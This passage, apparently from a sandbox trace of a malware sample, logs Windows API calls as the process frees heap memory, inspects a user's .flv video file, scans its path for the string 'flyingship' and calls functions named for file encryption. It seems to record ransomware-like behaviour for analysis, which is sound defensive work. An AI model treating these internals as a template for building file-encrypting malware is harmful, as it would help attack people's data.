hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0197.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0197.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0197.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0197.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0197.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0197.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0197.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0197.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0197.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0197.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0197.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0197.056] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0197.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0197.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0197.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0197.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0197.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0197.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0197.057] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0197.057] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0197.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0197.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0197.057] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0197.057] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0197.057] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0197.057] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.057] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0197.057] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0197.057] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0197.057] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0197.057] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="flv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0197.057] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".flv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0197.057] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.057] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.057] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.057] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7a5ae0, ftCreationTime.dwHighDateTime=0x1d5e65e, ftLastAccessTime.dwLowDateTime=0x1d6f670, ftLastAccessTime.dwHighDateTime=0x1d5dfb4, ftLastWriteTime.dwLowDateTime=0x1d6f670, ftLastWriteTime.dwHighDateTime=0x1d5dfb4, nFileSizeHigh=0x0, nFileSizeLow=0xb964, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="0vlShOAoYV07RlGs7cfh.flv", cAlternateFileName="0VLSHO~1.FLV")) returned 0x90add8 [0197.058] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0197.058] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.058] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7a5ae0, ftCreationTime.dwHighDateTime=0x1d5e65e, ftLastAccessTime.dwLowDateTime=0x1d6f670, ftLastAccessTime.dwHighDateTime=0x1d5dfb4, ftLastWriteTime.dwLowDateTime=0x1d6f670, ftLastWriteTime.dwHighDateTime=0x1d5dfb4, nFileSizeHigh=0x0, nFileSizeLow=0xb964, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="0vlShOAoYV07RlGs7cfh.flv", cAlternateFileName="0VLSHO~1.FLV")) returned 0x90add8 [0197.058] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0197.058] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.058] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.058] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.058] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.058] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.058] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.058] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.058] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.058] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.058] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.058] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.058] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.058] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GtzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tzCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zCZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CZzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zzg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zg\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vlShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.060] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ShOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hOAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OAoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AoYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oYV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YV07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="V07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="07RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RlGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lGs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Gs7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s7cfh.flv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.061] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.061] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0197.061] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0197.061] PeekMessageW (in: 